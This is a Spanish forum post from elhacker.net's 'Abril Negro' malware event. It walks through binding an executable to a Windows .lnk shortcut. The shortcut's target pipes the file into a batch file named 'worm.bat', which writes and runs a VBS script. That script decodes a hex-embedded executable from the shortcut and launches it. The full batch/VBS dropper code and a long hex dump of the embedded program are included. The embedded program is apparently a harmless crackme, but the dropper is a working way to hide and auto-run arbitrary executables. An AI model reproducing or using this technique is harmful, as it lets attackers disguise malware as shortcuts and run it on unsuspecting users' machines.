elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk  (Leído 3,749 veces)
Flamer


Desconectado Desconectado

Mensajes: 1.051


crack, crack y mas crack...


Ver Perfil WWW
[Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk
« en: 6 Abril 2017, 02:11 am »

Este tema lo publique en mi blog y ahora se los traigo aqui para el abril negro

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo

https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

 ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:



pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos



OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extensión bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk

nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

Código
  1.  
  2. @echo off
  3. echo option explicit                                           >worm.vbs
  4. echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs  
  5. echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs
  6. echo set shell = createobject("wscript.shell")                 >>worm.vbs
  7. echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs  
  8. echo largo=file.size                                           >>worm.vbs
  9. echo Set f = file.OpenAsTextStream()                           >>worm.vbs  
  10. echo for i=1 to largo                                          >>worm.vbs
  11. echo     bytes = bytes + f.read(1)                             >>worm.vbs  
  12. echo next                                                      >>worm.vbs
  13. echo f.close                                                   >>worm.vbs
  14. echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs  
  15. echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs
  16. echo for x=1 to len(bit(2)) step 2                             >>worm.vbs
  17. echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
  18. echo    file.write(chr("&H" + bytes))                          >>worm.vbs
  19. echo next                                                      >>worm.vbs
  20. echo file.close                                                >>worm.vbs
  21. echo wscript.sleep 2000                                        >>worm.vbs
  22. echo shell.run "Crackme1.exe",1                                >>worm.vbs
  23. wscript.exe worm.vbs
  24.  

al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

Código
  1. ==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000